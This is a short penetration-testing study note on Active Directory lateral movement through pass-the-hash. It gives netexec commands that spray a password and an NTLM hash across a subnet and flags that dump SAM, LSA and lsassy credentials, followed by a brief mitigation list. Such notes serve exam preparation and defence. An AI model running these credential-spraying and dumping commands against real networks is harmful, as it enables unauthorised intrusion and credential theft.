// notes/ Active Directory
🏛️
Lateral Movement Pass The Hash
With a cracked a password and or dumped SAM hashes, we can use both of them for lateral movement by passing them around machines in the network.
#active directory#adot8
source · oscp.adot8.com · active-directory/lateral-movement_pass-the-hash ↗Pass the Hash
Overview
With a cracked a password and or dumped SAM hashes, we can use both of them for lateral movement by passing them around machines in the network.
If the password/hash is one of a Local Administrator, we can use secretsdump to dump out more hashes from other computers, crack those passwords and pass them around again.
Netexec is the tool that will be used for this attack and it even stores a database of all the findings of the attack.
Netexec
Pass the Password
<pre class="language-bash"><code class="lang-bash"><strong>netexec smb 192.168.1.0/24 -u greg -d PNPT.local -p Password1 </strong></code></pre>Pass the Hash
bash
$netexec smb 192.168.1.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404e' --local-authPass the Hash Variations
bash
$--sam Dumps SAM $--shares Dumps shares being offered by the machine$--lsa Dumps LSA hashes (cached credentials)$-M lsassy Dumps lsassy (recent user logins)View crackmapexec database
bash
$nxcdb{% embed url="https://www.netexec.wiki/getting-started/database-general-usage" %}
Mitigation
- Limit account reuse
- Don't reuse Local Administrator passwords
- Disable Local Administrator and Guest accounts
- Limit who is an Administrator
- Strong password policy